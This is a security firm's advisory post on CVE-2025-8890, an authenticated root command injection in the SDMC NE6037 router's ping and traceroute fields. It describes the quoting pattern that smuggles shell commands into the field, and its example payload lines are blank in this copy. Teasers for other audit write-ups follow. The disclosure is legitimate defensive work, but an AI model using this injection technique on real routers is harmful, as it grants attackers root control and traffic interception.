CVE-2025-8890 Authenticated RCE in SDMC NE6037 router

Grzegorz Bronka

19 December, 2025

Introduction

When testing connectivity of the SDMC NE6037 router inputting a quote character into the “ping” utility revealed an error indicating a Remote Code Execution (RCE) vulnerability.

It is quite common to find RCE vulnerabilities in routers’ connectivity tools (such as ping or traceroute). The user-supplied parameters are passed without sanitization as a parameter to a shell command. This was confirmed to be the root cause in this instance.

Affected versions

Before version 7.1.12.2.44.

Prerequisites

Local network access to the router.
Valid administrator credentials.

PoC

Log in to the router’s HTTP interface.
Navigate to Diagnostic Tools. Both Ping and Traceroute utilities are vulnerable.
In the target address field, input the following payload:

Any command on the router can be executed as follows:

The command must start with a single quote, vertical bar, and another single quote: ‘|’
Every space in the command must be enclosed in two single quotes: ’ '

For example:

Becomes:

Example output:

Example of pwd command injection:

The whoami command returned root as the user.

Conclusion

The identified vulnerability permits an authenticated attacker to execute arbitrary commands with root privileges. This enables attacks such as network traffic interception or unauthorized access to sensitive router configuration data.

Other Insights

Extremaly quick AD takeover during Insider Threat audit

Jakub Żoczek

December 05, 2025

Insider Threat is a type of security test in which an auditor acts as a malicious employee and attempts to attack the organization from the inside. In this way, internal threats can be detected that the company might face in the event of an employee's workstation access being compromised, as well as the potential risk when the employee themselves has malicious intentions. The client provides a workstation configured identically to other employee workstations, as well as additional credentials that allow connection to email systems, the Intranet, or VPN. In other words - an artificial employee is created whose goal is to detect vulnerabilities, exfiltrate sensitive data, or - if possible - take control of the network or key servers.

READ article

Illustration of Hidden vulnerabilities with visible consequences – from enumeration, through Blind SQL Injection, to the database administrator

Hidden vulnerabilities with visible consequences – from enumeration, through Blind SQL Injection, to the database administrator

Patryk Bogdan

November 24, 2025

As security auditors, we daily encounter solutions whose exact structure or logic is unknown to us. Therefore, one of the first and fundamental steps in conducting a security audit is the process of gathering information about the solution being tested. In this case, the story concerns a web application.

READ article

How "simple" math can crash your app. Support for exponential number format leads to Denial of Service.

Kamil Szczurowski

November 14, 2025

During one of the audits, I noticed that some application accepted numbers in the exponential format (for example 5e10), however, all the fields were strongly typed – I couldn’t set any of the fields to a number higher than the Integer maximum value. Nevertheless, I kept that fact in my mind and continued to check other numerical fields with vast numbers that would exceed the integer limit. After some time, I finally found a field that did accept a number higher than integer, float or double, which meant that the variable type was BigInteger. Finding such variable type and a possibility to use exponential number format created a new vector for an attack – if application allows conducting any arithmetic equation, there is a chance to conduct a Denial of Service (DoS) attack.

READ article

A professional cybersecurity consultant ready to assist with your inquiry.

Any questions?